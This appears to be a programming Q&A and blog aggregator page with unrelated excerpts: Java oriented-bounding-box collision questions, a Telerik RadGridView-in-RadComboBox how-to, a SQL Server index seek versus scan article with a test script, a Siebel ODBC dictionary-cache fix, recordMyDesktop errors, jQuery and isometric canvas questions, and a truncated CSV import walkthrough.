    I have an OBB2D class based on SAT. This is my point in OBB method: public boolean pointInside(float x, float y) { float newy = (float) (Math.sin(angle) * (y - center.y) + Math.cos(angle) * (x - center.x)); float newx = (float) (Math.cos(angle) * (x - center.x) - Math.sin(angle) * (y - center.y)); return (newy > center.y - (getHeight() / 2)) && (newy < center.y + (getHeight() / 2)) && (newx > center.x - (getWidth() / 2)) && (newx < center.x + (getWidth() / 2)); } public boolean pointInside(Vector2D v) { return pointInside(v.x,v.y); } Here is the rest of the class; the parts that pertain: public class OBB2D { private Vector2D projVec = new Vector2D(); private static Vector2D projAVec = new Vector2D(); private static Vector2D projBVec = new Vector2D(); private static Vector2D tempNormal = new Vector2D(); private Vector2D deltaVec = new Vector2D(); private ArrayList<Vector2D> collisionPoints = new ArrayList<Vector2D>(); // Corners of the box, where 0 is the lower left. private Vector2D corner[] = new Vector2D[4]; private Vector2D center = new Vector2D(); private Vector2D extents = new Vector2D(); private RectF boundingRect = new RectF(); private float angle; //Two edges of the box extended away from corner[0]. private Vector2D axis[] = new Vector2D[2]; private double origin[] = new double[2]; public OBB2D(float centerx, float centery, float w, float h, float angle) { for(int i = 0; i < corner.length; ++i) { corner[i] = new Vector2D(); } for(int i = 0; i < axis.length; ++i) { axis[i] = new Vector2D(); } set(centerx,centery,w,h,angle); } public OBB2D(float left, float top, float width, float height) { for(int i = 0; i < corner.length; ++i) { corner[i] = new Vector2D(); } for(int i = 0; i < axis.length; ++i) { axis[i] = new Vector2D(); } set(left + (width / 2), top + (height / 2),width,height,0.0f); } public void set(float centerx,float centery,float w, float h,float angle) { float vxx = (float)Math.cos(angle); float vxy = (float)Math.sin(angle); float vyx = (float)-Math.sin(angle); float vyy = (float)Math.cos(angle); vxx *= w / 2; vxy *= (w / 2); vyx *= (h / 2); vyy *= (h / 2); corner[0].x = centerx - vxx - vyx; corner[0].y = centery - vxy - vyy; corner[1].x = centerx + vxx - vyx; corner[1].y = centery + vxy - vyy; corner[2].x = centerx + vxx + vyx; corner[2].y = centery + vxy + vyy; corner[3].x = centerx - vxx + vyx; corner[3].y = centery - vxy + vyy; this.center.x = centerx; this.center.y = centery; this.angle = angle; computeAxes(); extents.x = w / 2; extents.y = h / 2; computeBoundingRect(); } //Updates the axes after the corners move. Assumes the //corners actually form a rectangle. private void computeAxes() { axis[0].x = corner[1].x - corner[0].x; axis[0].y = corner[1].y - corner[0].y; axis[1].x = corner[3].x - corner[0].x; axis[1].y = corner[3].y - corner[0].y; // Make the length of each axis 1/edge length so we know any // dot product must be less than 1 to fall within the edge. for (int a = 0; a < axis.length; ++a) { float l = axis[a].length(); float ll = l * l; axis[a].x = axis[a].x / ll; axis[a].y = axis[a].y / ll; origin[a] = corner[0].dot(axis[a]); } } public void computeBoundingRect() { boundingRect.left = JMath.min(JMath.min(corner[0].x, corner[3].x), JMath.min(corner[1].x, corner[2].x)); boundingRect.top = JMath.min(JMath.min(corner[0].y, corner[1].y),JMath.min(corner[2].y, corner[3].y)); boundingRect.right = JMath.max(JMath.max(corner[1].x, corner[2].x), JMath.max(corner[0].x, corner[3].x)); boundingRect.bottom = JMath.max(JMath.max(corner[2].y, corner[3].y),JMath.max(corner[0].y, corner[1].y)); } public void set(RectF rect) { set(rect.centerX(),rect.centerY(),rect.width(),rect.height(),0.0f); } // Returns true if other overlaps one dimension of this. private boolean overlaps1Way(OBB2D other) { for (int a = 0; a < axis.length; ++a) { double t = other.corner[0].dot(axis[a]); // Find the extent of box 2 on axis a double tMin = t; double tMax = t; for (int c = 1; c < corner.length; ++c) { t = other.corner[c].dot(axis[a]); if (t < tMin) { tMin = t; } else if (t > tMax) { tMax = t; } } // We have to subtract off the origin // See if [tMin, tMax] intersects [0, 1] if ((tMin > 1 + origin[a]) || (tMax < origin[a])) { // There was no intersection along this dimension; // the boxes cannot possibly overlap. return false; } } // There was no dimension along which there is no intersection. // Therefore the boxes overlap. return true; } public void moveTo(float centerx, float centery) { float cx,cy; cx = center.x; cy = center.y; deltaVec.x = centerx - cx; deltaVec.y = centery - cy; for (int c = 0; c < 4; ++c) { corner[c].x += deltaVec.x; corner[c].y += deltaVec.y; } boundingRect.left += deltaVec.x; boundingRect.top += deltaVec.y; boundingRect.right += deltaVec.x; boundingRect.bottom += deltaVec.y; this.center.x = centerx; this.center.y = centery; computeAxes(); } // Returns true if the intersection of the boxes is non-empty. public boolean overlaps(OBB2D other) { if(right() < other.left()) { return false; } if(bottom() < other.top()) { return false; } if(left() > other.right()) { return false; } if(top() > other.bottom()) { return false; } if(other.getAngle() == 0.0f && getAngle() == 0.0f) { return true; } return overlaps1Way(other) && other.overlaps1Way(this); } public Vector2D getCenter() { return center; } public float getWidth() { return extents.x * 2; } public float getHeight() { return extents.y * 2; } public void setAngle(float angle) { set(center.x,center.y,getWidth(),getHeight(),angle); } public float getAngle() { return angle; } public void setSize(float w,float h) { set(center.x,center.y,w,h,angle); } public float left() { return boundingRect.left; } public float right() { return boundingRect.right; } public float bottom() { return boundingRect.bottom; } public float top() { return boundingRect.top; } public RectF getBoundingRect() { return boundingRect; } public boolean overlaps(float left, float top, float right, float bottom) { if(right() < left) { return false; } if(bottom() < top) { return false; } if(left() > right) { return false; } if(top() > bottom) { return false; } return true; } public static float distance(float ax, float ay,float bx, float by) { if (ax < bx) return bx - ay; else return ax - by; } public Vector2D project(float ax, float ay) { projVec.x = Float.MAX_VALUE; projVec.y = Float.MIN_VALUE; for (int i = 0; i < corner.length; ++i) { float dot = Vector2D.dot(corner[i].x,corner[i].y,ax,ay); projVec.x = JMath.min(dot, projVec.x); projVec.y = JMath.max(dot, projVec.y); } return projVec; } public Vector2D getCorner(int c) { return corner[c]; } public int getNumCorners() { return corner.length; } public boolean pointInside(float x, float y) { float newy = (float) (Math.sin(angle) * (y - center.y) + Math.cos(angle) * (x - center.x)); float newx = (float) (Math.cos(angle) * (x - center.x) - Math.sin(angle) * (y - center.y)); return (newy > center.y - (getHeight() / 2)) && (newy < center.y + (getHeight() / 2)) && (newx > center.x - (getWidth() / 2)) && (newx < center.x + (getWidth() / 2)); } public boolean pointInside(Vector2D v) { return pointInside(v.x,v.y); } public ArrayList<Vector2D> getCollsionPoints(OBB2D b) { collisionPoints.clear(); for(int i = 0; i < corner.length; ++i) { if(b.pointInside(corner[i])) { collisionPoints.add(corner[i]); } } for(int i = 0; i < b.corner.length; ++i) { if(pointInside(b.corner[i])) { collisionPoints.add(b.corner[i]); } } return collisionPoints; } }; What could be wrong? When I getCollisionPoints for 2 OBBs I know are penetrating, it returns no points. Thanks

    Read the article

  • How To: Filter as you type RadGridView inside RadComboBox for WPF and Silverlight

    Ive made small example on how to place RadGridView inside editable RadComboBox and filter the grid items as you type in the combo:   The easiest way to place any UI element in RadComboBox is to create single RadComboBoxItem and define desired Template: <telerikInput:RadComboBox Text="{Binding Text, Mode=TwoWay}" IsEditable="True" Height="25" Width="200"> <telerikInput:RadComboBox.Items> <telerikInput:RadComboBoxItem> <telerikInput:RadComboBoxItem.Template> <ControlTemplate> <telerikGrid:RadGridView x:Name="RadGridView1" ShowGroupPanel="False" CanUserFreezeColumns="False" RowIndicatorVisibility="Collapsed" IsReadOnly="True" IsFilteringAllowed="False" ItemsSource="{Binding Items}" Width="200" Height="150" SelectedItem="{Binding SelectedItem, Mode=TwoWay}"> </telerikGrid:RadGridView> </ControlTemplate> </telerikInput:RadComboBoxItem.Template> </telerikInput:RadComboBoxItem> </telerikInput:RadComboBox.Items> </telerikInput:RadComboBox> Now you can create small view model and bind ...Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

    Read the article

  • Point of contact of 2 OBBs?

    - by Milo
    I'm working on the physics for my GTA2-like game so I can learn more about game physics. The collision detection and resolution are working great. I'm now just unsure how to compute the point of contact when I hit a wall. Here is my OBB class: public class OBB2D { private Vector2D projVec = new Vector2D(); private static Vector2D projAVec = new Vector2D(); private static Vector2D projBVec = new Vector2D(); private static Vector2D tempNormal = new Vector2D(); private Vector2D deltaVec = new Vector2D(); // Corners of the box, where 0 is the lower left. private Vector2D corner[] = new Vector2D[4]; private Vector2D center = new Vector2D(); private Vector2D extents = new Vector2D(); private RectF boundingRect = new RectF(); private float angle; //Two edges of the box extended away from corner[0]. private Vector2D axis[] = new Vector2D[2]; private double origin[] = new double[2]; public OBB2D(float centerx, float centery, float w, float h, float angle) { for(int i = 0; i < corner.length; ++i) { corner[i] = new Vector2D(); } for(int i = 0; i < axis.length; ++i) { axis[i] = new Vector2D(); } set(centerx,centery,w,h,angle); } public OBB2D(float left, float top, float width, float height) { for(int i = 0; i < corner.length; ++i) { corner[i] = new Vector2D(); } for(int i = 0; i < axis.length; ++i) { axis[i] = new Vector2D(); } set(left + (width / 2), top + (height / 2),width,height,0.0f); } public void set(float centerx,float centery,float w, float h,float angle) { float vxx = (float)Math.cos(angle); float vxy = (float)Math.sin(angle); float vyx = (float)-Math.sin(angle); float vyy = (float)Math.cos(angle); vxx *= w / 2; vxy *= (w / 2); vyx *= (h / 2); vyy *= (h / 2); corner[0].x = centerx - vxx - vyx; corner[0].y = centery - vxy - vyy; corner[1].x = centerx + vxx - vyx; corner[1].y = centery + vxy - vyy; corner[2].x = centerx + vxx + vyx; corner[2].y = centery + vxy + vyy; corner[3].x = centerx - vxx + vyx; corner[3].y = centery - vxy + vyy; this.center.x = centerx; this.center.y = centery; this.angle = angle; computeAxes(); extents.x = w / 2; extents.y = h / 2; computeBoundingRect(); } //Updates the axes after the corners move. Assumes the //corners actually form a rectangle. private void computeAxes() { axis[0].x = corner[1].x - corner[0].x; axis[0].y = corner[1].y - corner[0].y; axis[1].x = corner[3].x - corner[0].x; axis[1].y = corner[3].y - corner[0].y; // Make the length of each axis 1/edge length so we know any // dot product must be less than 1 to fall within the edge. for (int a = 0; a < axis.length; ++a) { float l = axis[a].length(); float ll = l * l; axis[a].x = axis[a].x / ll; axis[a].y = axis[a].y / ll; origin[a] = corner[0].dot(axis[a]); } } public void computeBoundingRect() { boundingRect.left = JMath.min(JMath.min(corner[0].x, corner[3].x), JMath.min(corner[1].x, corner[2].x)); boundingRect.top = JMath.min(JMath.min(corner[0].y, corner[1].y),JMath.min(corner[2].y, corner[3].y)); boundingRect.right = JMath.max(JMath.max(corner[1].x, corner[2].x), JMath.max(corner[0].x, corner[3].x)); boundingRect.bottom = JMath.max(JMath.max(corner[2].y, corner[3].y),JMath.max(corner[0].y, corner[1].y)); } public void set(RectF rect) { set(rect.centerX(),rect.centerY(),rect.width(),rect.height(),0.0f); } // Returns true if other overlaps one dimension of this. private boolean overlaps1Way(OBB2D other) { for (int a = 0; a < axis.length; ++a) { double t = other.corner[0].dot(axis[a]); // Find the extent of box 2 on axis a double tMin = t; double tMax = t; for (int c = 1; c < corner.length; ++c) { t = other.corner[c].dot(axis[a]); if (t < tMin) { tMin = t; } else if (t > tMax) { tMax = t; } } // We have to subtract off the origin // See if [tMin, tMax] intersects [0, 1] if ((tMin > 1 + origin[a]) || (tMax < origin[a])) { // There was no intersection along this dimension; // the boxes cannot possibly overlap. return false; } } // There was no dimension along which there is no intersection. // Therefore the boxes overlap. return true; } public void moveTo(float centerx, float centery) { float cx,cy; cx = center.x; cy = center.y; deltaVec.x = centerx - cx; deltaVec.y = centery - cy; for (int c = 0; c < 4; ++c) { corner[c].x += deltaVec.x; corner[c].y += deltaVec.y; } boundingRect.left += deltaVec.x; boundingRect.top += deltaVec.y; boundingRect.right += deltaVec.x; boundingRect.bottom += deltaVec.y; this.center.x = centerx; this.center.y = centery; computeAxes(); } // Returns true if the intersection of the boxes is non-empty. public boolean overlaps(OBB2D other) { if(right() < other.left()) { return false; } if(bottom() < other.top()) { return false; } if(left() > other.right()) { return false; } if(top() > other.bottom()) { return false; } if(other.getAngle() == 0.0f && getAngle() == 0.0f) { return true; } return overlaps1Way(other) && other.overlaps1Way(this); } public Vector2D getCenter() { return center; } public float getWidth() { return extents.x * 2; } public float getHeight() { return extents.y * 2; } public void setAngle(float angle) { set(center.x,center.y,getWidth(),getHeight(),angle); } public float getAngle() { return angle; } public void setSize(float w,float h) { set(center.x,center.y,w,h,angle); } public float left() { return boundingRect.left; } public float right() { return boundingRect.right; } public float bottom() { return boundingRect.bottom; } public float top() { return boundingRect.top; } public RectF getBoundingRect() { return boundingRect; } public boolean overlaps(float left, float top, float right, float bottom) { if(right() < left) { return false; } if(bottom() < top) { return false; } if(left() > right) { return false; } if(top() > bottom) { return false; } return true; } public static float distance(float ax, float ay,float bx, float by) { if (ax < bx) return bx - ay; else return ax - by; } public Vector2D project(float ax, float ay) { projVec.x = Float.MAX_VALUE; projVec.y = Float.MIN_VALUE; for (int i = 0; i < corner.length; ++i) { float dot = Vector2D.dot(corner[i].x,corner[i].y,ax,ay); projVec.x = JMath.min(dot, projVec.x); projVec.y = JMath.max(dot, projVec.y); } return projVec; } public Vector2D getCorner(int c) { return corner[c]; } public int getNumCorners() { return corner.length; } public static float collisionResponse(OBB2D a, OBB2D b, Vector2D outNormal) { float depth = Float.MAX_VALUE; for (int i = 0; i < a.getNumCorners() + b.getNumCorners(); ++i) { Vector2D edgeA; Vector2D edgeB; if(i >= a.getNumCorners()) { edgeA = b.getCorner((i + b.getNumCorners() - 1) % b.getNumCorners()); edgeB = b.getCorner(i % b.getNumCorners()); } else { edgeA = a.getCorner((i + a.getNumCorners() - 1) % a.getNumCorners()); edgeB = a.getCorner(i % a.getNumCorners()); } tempNormal.x = edgeB.x -edgeA.x; tempNormal.y = edgeB.y - edgeA.y; tempNormal.normalize(); projAVec.equals(a.project(tempNormal.x,tempNormal.y)); projBVec.equals(b.project(tempNormal.x,tempNormal.y)); float distance = OBB2D.distance(projAVec.x, projAVec.y,projBVec.x,projBVec.y); if (distance > 0.0f) { return 0.0f; } else { float d = Math.abs(distance); if (d < depth) { depth = d; outNormal.equals(tempNormal); } } } float dx,dy; dx = b.getCenter().x - a.getCenter().x; dy = b.getCenter().y - a.getCenter().y; float dot = Vector2D.dot(dx,dy,outNormal.x,outNormal.y); if(dot > 0) { outNormal.x = -outNormal.x; outNormal.y = -outNormal.y; } return depth; } public Vector2D getMoveDeltaVec() { return deltaVec; } }; Thanks!

    Read the article

  • So…is it a Seek or a Scan?

    - by Paul White
    You’re probably most familiar with the terms ‘Seek’ and ‘Scan’ from the graphical plans produced by SQL Server Management Studio (SSMS).  The image to the left shows the most common ones, with the three types of scan at the top, followed by four types of seek.  You might look to the SSMS tool-tip descriptions to explain the differences between them: Not hugely helpful are they?  Both mention scans and ranges (nothing about seeks) and the Index Seek description implies that it will not scan the index entirely (which isn’t necessarily true). Recall also yesterday’s post where we saw two Clustered Index Seek operations doing very different things.  The first Seek performed 63 single-row seeking operations; and the second performed a ‘Range Scan’ (more on those later in this post).  I hope you agree that those were two very different operations, and perhaps you are wondering why there aren’t different graphical plan icons for Range Scans and Seeks?  I have often wondered about that, and the first person to mention it after yesterday’s post was Erin Stellato (twitter | blog): Before we go on to make sense of all this, let’s look at another example of how SQL Server confusingly mixes the terms ‘Scan’ and ‘Seek’ in different contexts.  The diagram below shows a very simple heap table with two columns, one of which is the non-clustered Primary Key, and the other has a non-unique non-clustered index defined on it.  The right hand side of the diagram shows a simple query, it’s associated query plan, and a couple of extracts from the SSMS tool-tip and Properties windows. Notice the ‘scan direction’ entry in the Properties window snippet.  Is this a seek or a scan?  The different references to Scans and Seeks are even more pronounced in the XML plan output that the graphical plan is based on.  This fragment is what lies behind the single Index Seek icon shown above: You’ll find the same confusing references to Seeks and Scans throughout the product and its documentation. Making Sense of Seeks Let’s forget all about scans for a moment, and think purely about seeks.  Loosely speaking, a seek is the process of navigating an index B-tree to find a particular index record, most often at the leaf level.  A seek starts at the root and navigates down through the levels of the index to find the point of interest: Singleton Lookups The simplest sort of seek predicate performs this traversal to find (at most) a single record.  This is the case when we search for a single value using a unique index and an equality predicate.  It should be readily apparent that this type of search will either find one record, or none at all.  This operation is known as a singleton lookup.  Given the example table from before, the following query is an example of a singleton lookup seek: Sadly, there’s nothing in the graphical plan or XML output to show that this is a singleton lookup – you have to infer it from the fact that this is a single-value equality seek on a unique index.  The other common examples of a singleton lookup are bookmark lookups – both the RID and Key Lookup forms are singleton lookups (an RID lookup finds a single record in a heap from the unique row locator, and a Key Lookup does much the same thing on a clustered table).  If you happen to run your query with STATISTICS IO ON, you will notice that ‘Scan Count’ is always zero for a singleton lookup. Range Scans The other type of seek predicate is a ‘seek plus range scan’, which I will refer to simply as a range scan.  The seek operation makes an initial descent into the index structure to find the first leaf row that qualifies, and then performs a range scan (either backwards or forwards in the index) until it reaches the end of the scan range. The ability of a range scan to proceed in either direction comes about because index pages at the same level are connected by a doubly-linked list – each page has a pointer to the previous page (in logical key order) as well as a pointer to the following page.  The doubly-linked list is represented by the green and red dotted arrows in the index diagram presented earlier.  One subtle (but important) point is that the notion of a ‘forward’ or ‘backward’ scan applies to the logical key order defined when the index was built.  In the present case, the non-clustered primary key index was created as follows: CREATE TABLE dbo.Example ( key_col INTEGER NOT NULL, data INTEGER NOT NULL, CONSTRAINT [PK dbo.Example key_col] PRIMARY KEY NONCLUSTERED (key_col ASC) ) ; Notice that the primary key index specifies an ascending sort order for the single key column.  This means that a forward scan of the index will retrieve keys in ascending order, while a backward scan would retrieve keys in descending key order.  If the index had been created instead on key_col DESC, a forward scan would retrieve keys in descending order, and a backward scan would return keys in ascending order. A range scan seek predicate may have a Start condition, an End condition, or both.  Where one is missing, the scan starts (or ends) at one extreme end of the index, depending on the scan direction.  Some examples might help clarify that: the following diagram shows four queries, each of which performs a single seek against a column holding every integer from 1 to 100 inclusive.  The results from each query are shown in the blue columns, and relevant attributes from the Properties window appear on the right: Query 1 specifies that all key_col values less than 5 should be returned in ascending order.  The query plan achieves this by seeking to the start of the index leaf (there is no explicit starting value) and scanning forward until the End condition (key_col < 5) is no longer satisfied (SQL Server knows it can stop looking as soon as it finds a key_col value that isn’t less than 5 because all later index entries are guaranteed to sort higher). Query 2 asks for key_col values greater than 95, in descending order.  SQL Server returns these results by seeking to the end of the index, and scanning backwards (in descending key order) until it comes across a row that isn’t greater than 95.  Sharp-eyed readers may notice that the end-of-scan condition is shown as a Start range value.  This is a bug in the XML show plan which bubbles up to the Properties window – when a backward scan is performed, the roles of the Start and End values are reversed, but the plan does not reflect that.  Oh well. Query 3 looks for key_col values that are greater than or equal to 10, and less than 15, in ascending order.  This time, SQL Server seeks to the first index record that matches the Start condition (key_col >= 10) and then scans forward through the leaf pages until the End condition (key_col < 15) is no longer met. Query 4 performs much the same sort of operation as Query 3, but requests the output in descending order.  Again, we have to mentally reverse the Start and End conditions because of the bug, but otherwise the process is the same as always: SQL Server finds the highest-sorting record that meets the condition ‘key_col < 25’ and scans backward until ‘key_col >= 20’ is no longer true. One final point to note: seek operations always have the Ordered: True attribute.  This means that the operator always produces rows in a sorted order, either ascending or descending depending on how the index was defined, and whether the scan part of the operation is forward or backward.  You cannot rely on this sort order in your queries of course (you must always specify an ORDER BY clause if order is important) but SQL Server can make use of the sort order internally.  In the four queries above, the query optimizer was able to avoid an explicit Sort operator to honour the ORDER BY clause, for example. Multiple Seek Predicates As we saw yesterday, a single index seek plan operator can contain one or more seek predicates.  These seek predicates can either be all singleton seeks or all range scans – SQL Server does not mix them.  For example, you might expect the following query to contain two seek predicates, a singleton seek to find the single record in the unique index where key_col = 10, and a range scan to find the key_col values between 15 and 20: SELECT key_col FROM dbo.Example WHERE key_col = 10 OR key_col BETWEEN 15 AND 20 ORDER BY key_col ASC ; In fact, SQL Server transforms the singleton seek (key_col = 10) to the equivalent range scan, Start:[key_col >= 10], End:[key_col <= 10].  This allows both range scans to be evaluated by a single seek operator.  To be clear, this query results in two range scans: one from 10 to 10, and one from 15 to 20. Final Thoughts That’s it for today – tomorrow we’ll look at monitoring singleton lookups and range scans, and I’ll show you a seek on a heap table. Yes, a seek.  On a heap.  Not an index! If you would like to run the queries in this post for yourself, there’s a script below.  Thanks for reading! IF OBJECT_ID(N'dbo.Example', N'U') IS NOT NULL BEGIN DROP TABLE dbo.Example; END ; -- Test table is a heap -- Non-clustered primary key on 'key_col' CREATE TABLE dbo.Example ( key_col INTEGER NOT NULL, data INTEGER NOT NULL, CONSTRAINT [PK dbo.Example key_col] PRIMARY KEY NONCLUSTERED (key_col) ) ; -- Non-unique non-clustered index on the 'data' column CREATE NONCLUSTERED INDEX [IX dbo.Example data] ON dbo.Example (data) ; -- Add 100 rows INSERT dbo.Example WITH (TABLOCKX) ( key_col, data ) SELECT key_col = V.number, data = V.number FROM master.dbo.spt_values AS V WHERE V.[type] = N'P' AND V.number BETWEEN 1 AND 100 ; -- ================ -- Singleton lookup -- ================ ; -- Single value equality seek in a unique index -- Scan count = 0 when STATISTIS IO is ON -- Check the XML SHOWPLAN SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col = 32 ; -- =========== -- Range Scans -- =========== ; -- Query 1 SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col <= 5 ORDER BY E.key_col ASC ; -- Query 2 SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col > 95 ORDER BY E.key_col DESC ; -- Query 3 SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col >= 10 AND E.key_col < 15 ORDER BY E.key_col ASC ; -- Query 4 SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col >= 20 AND E.key_col < 25 ORDER BY E.key_col DESC ; -- Final query (singleton + range = 2 range scans) SELECT E.key_col FROM dbo.Example AS E WHERE E.key_col = 10 OR E.key_col BETWEEN 15 AND 20 ORDER BY E.key_col ASC ; -- === TIDY UP === DROP TABLE dbo.Example; © 2011 Paul White email: [email protected] twitter: @SQL_Kiwi

    Read the article

  • Siebel Troubleshooting : An ODBC error occurred; SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl

    - by Giri Mandalika
    Symptom: A newly installed Siebel application server fails to start despite successful ODBC connectivity to the database. SRProc process logs ODBC error messages similar to the following: Message: GEN-13, Additional Message: dict-ERR-1109: Unable to read value from export file (Data length (32) Column definition (3)). Message: GEN-13, Additional Message: dict-ERR-1107: Unable to read row 0 from export file (UTLDataValRead pBuf, col 4 ). GenericLog GenericError 1 0002157.. 11-11-18 13:28 Message: Generated SQL statement:, Additional Message: SQLFetch: SELECT RDOBJ.DOCK_ID, RDOBJ.RELATED_DOCK_ID, RDOBJ.SQL_STATEMENT, RDOBJ.CHECK_VISIBILITY, 'N', RDOBJ.COMMENTS, RDOBJ.ACTIVE, RDOBJ.SEQUENCE, RDOBJ.VIS_STRENGTH, RDOBJ.REL_VIS_STRENGTH, RDOBJ.VIS_EVT_COLS FROM ORAPERF.S_DOCK_REL_DOBJ RDOBJ, ORAPERF.S_DOCK_OBJECT DOBJ WHERE RDOBJ.REPOSITORY_ID = (SELECT ROW_ID FROM ORAPERF.S_REPOSITORY WHERE NAME = ?) AND DOBJ.ROW_ID = RDOBJ.DOCK_ID AND (DOBJ.INACTIVE_FLG = 'N' OR DOBJ.INACTIVE_FLG IS NULL) AND (RDOBJ.INACTIVE_FLG = 'N' OR RDOBJ.INACTIVE_FLG IS NULL) Message: Error: An ODBC error occurred, Additional Message: Function: DICGetRDObjects; ODBC operation: SQLFetch Message: GEN-13, Additional Message: dict-ERR-1109: Unable to read value from export file (UTLCompressFRead (fseek)). Message: GEN-13, Additional Message: dict-ERR-1107: Unable to read row 0 from export file (UTLDataValRead pBuf, col 0 ). Message: GEN-10, Additional Message: Calling Function: DICLoadDObjectInfo; Called Function: Calling DICGetRDObjects Message: GEN-10, Additional Message: Calling Function: DICLoadDict; Called Function: DICLoadDObjectInfo GenericError (srpdb.cpp (860) err=3006 sys=2) SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl (srpsmech.cpp (74) err=3006 sys=0) SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl (srpmtsrv.cpp (107) err=3006 sys=0) SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl (smimtsrv.cpp (1203) err=3006 sys=0) SBL-GEN-03006: Error calling function: DICFindTable m_pReqTbl SmiLayerLog Error Terminate process due to unrecoverable error: 3006. (Main Thread) An inconsistent or corrupted dictionary file "diccache.dat" is likely the cause. Solution: Stop the application server and manually kill the remaining Siebel application specific processes eg., stop_server all pkill siebmtsh pkill siebproc .. Remove $SIEBEL_HOME/bin/diccache.dat file. It will be re-generated during the application server startup Start the application server start_server all

    Read the article

  • recordMyDesktop stopped working after upgrade

    - by anfeo
    Hi, I've done the upgrade to Ubuntu 10.10 from Ubuntu 10.04, and recordMydesktop don't work now. If I start it from command line it seam to work, but the interface don't start and I have this error: Initial recording window is set to: X:0 Y:0 Width:1680 Height:945 Adjusted recording window is set to: X:0 Y:0 Width:1680 Height:944 Your window manager appears to be Metacity Initializing... Buffer size adjusted to 4096 from 4096 frames. Opened PCM device default Recording on device default is set to: 1 channels at 22050Hz X Error: BadAccess (attempt to access private resource denied) Bad Access on XGrabKey. Shortcut already assigned. X Error: BadAccess (attempt to access private resource denied) Bad Access on XGrabKey. Shortcut already assigned. X Error: BadAccess (attempt to access private resource denied) Bad Access on XGrabKey. Shortcut already assigned. X Error: BadAccess (attempt to access private resource denied) Bad Access on XGrabKey. Shortcut already assigned. Capturing! X Error: BadAccess (attempt to access private resource denied) Bad Access on XGrabKey. Shortcut already assigned. X Error: BadAccess (attempt to access private resource denied) Bad Access on XGrabKey. Shortcut already assigned. X Error: BadAccess (attempt to access private resource denied) Bad Access on XGrabKey. Shortcut already assigned. X Error: BadAccess (attempt to access private resource denied) Bad Access on XGrabKey. Shortcut already assigned.

    Read the article

  • Replace Javascript click event with timed event?

    - by Rik
    Hi, I've found some javascript code that layers photos on top of each other when you click on them. Rather than having to click I'd like the function to automatically run every 5 seconds. How can I change this event to a timed one: $('a#nextImage, #image img').click(function(event){ Full code below. Thanks <script type="text/javascript"> $(document).ready(function(){ $('#description').css({'display':'block'}); $('#image img').hover(function() { $(this).addClass('hover'); }, function() { $(this).removeClass('hover'); }); $('a#nextImage, #image img').click(function(event){ event.preventDefault(); $('#description p:first-child').css({'visibility':'hidden'}); if($('#image img.current').next().length){ $('#image img.current').removeClass('current').next().fadeIn('normal').addClass('current').css({'position':'absolute'}); }else{ $('#image img').removeClass('current').css({'display':'none'}); $('#image img:first-child').fadeIn('normal').addClass('current').css({'position':'absolute'}); } if($('#image img.current').width()>=($('#page').width()-100)){ xPos=170; }else{ do{ xPos = 120 + (Math.floor(Math.random()*($('#page').width()-100))); }while(xPos+$('#image img.current').width()>$('#page').width()); } if($('#image img.current').height()>=300){ yPos=0; }else{ do{ yPos = Math.floor(Math.random()*300); }while(yPos+$('#image img.current').height()>300); } $('#image img.current').css({'left':xPos,'top':yPos}); }); });

    Read the article

  • Isometric displaying two different images in different positions

    - by Canvas
    I'm creating a simple Isometric game using HTML5 and Javascript, but I can't seem to get the display to work, at the moment i have 9 tiles that have X and Y positions and the player has a X and Y position, the players X and Y properties are set to 100, and the tiles are as shown tiles[0] = new Array(3); tiles[1] = new Array(3); tiles[2] = new Array(3); tiles[0][0] = new point2D( 100, 100); tiles[0][1] = new point2D( 160, 100); tiles[0][2] = new point2D( 220, 100); tiles[1][0] = new point2D( 100, 160); tiles[1][1] = new point2D( 160, 160); tiles[1][2] = new point2D( 220, 160); tiles[2][0] = new point2D( 100, 220); tiles[2][1] = new point2D( 160, 220); tiles[2][2] = new point2D( 220, 220); Now I use this method to work out the isometric position function twoDToIso( point ) { var cords = point2D; cords.x = point.x - point.y; cords.y = (point.x + point.y) / 2; return cords; } point2D is function point2D( x, y) { this.x = x; this.y = y; } Now this i'm sure does work out the correct positioning, but here is the output Isometric view I just need to move my player position a tiny bit, but is that the best way to display my player position in the right position? Canvas P.S. the tile width is 120 and height is 60 and the player is width 30 by height 15

    Read the article

  • SQL SERVER – Import CSV into Database – Transferring File Content into a Database Table using CSVexpress

    - by pinaldave
    One of the most common data integration tasks I run into is a desire to move data from a file into a database table.  Generally the user is familiar with his data, the structure of the file, and the database table, but is unfamiliar with data integration tools and therefore views this task as something that is difficult.  What these users really need is a point and click approach that minimizes the learning curve for the data integration tool.  This is what CSVexpress (www.CSVexpress.com) is all about!  It is based on expressor Studio, a data integration tool I’ve been reviewing over the last several months. With CSVexpress, moving data between data sources can be as simple as providing the database connection details, describing the structure of the incoming and outgoing data and then connecting two pre-programmed operators.   There’s no need to learn the intricacies of the data integration tool or to write code.  Let’s look at an example. Suppose I have a comma separated value data file with data similar to the following, which is a listing of terminated employees that includes their hiring and termination date, department, job description, and final salary. EMP_ID,STRT_DATE,END_DATE,JOB_ID,DEPT_ID,SALARY 102,13-JAN-93,24-JUL-98 17:00,Programmer,60,"$85,000" 101,21-SEP-89,27-OCT-93 17:00,Account Representative,110,"$65,000" 103,28-OCT-93,15-MAR-97 17:00,Account Manager,110,"$75,000" 304,17-FEB-96,19-DEC-99 17:00,Marketing,20,"$45,000" 333,24-MAR-98,31-DEC-99 17:00,Data Entry Clerk,50,"$35,000" 100,17-SEP-87,17-JUN-93 17:00,Administrative Assistant,90,"$40,000" 334,24-MAR-98,31-DEC-98 17:00,Sales Representative,80,"$40,000" 400,01-JAN-99,31-DEC-99 17:00,Sales Manager,80,"$55,000" Notice the concise format used for the date values, the fact that the termination date includes both date and time information, and that the salary is clearly identified as money by the dollar sign and digit grouping.  In moving this data to a database table I want to express the dates using a format that includes the century since it’s obvious that this listing could include employees who left the company in both the 20th and 21st centuries, and I want the salary to be stored as a decimal value without the currency symbol and grouping character.  Most data integration tools would require coding within a transformation operation to effect these changes, but not expressor Studio.  Directives for these modifications are included in the description of the incoming data. Besides starting the expressor Studio tool and opening a project, the first step is to create connection artifacts, which describe to expressor where data is stored.  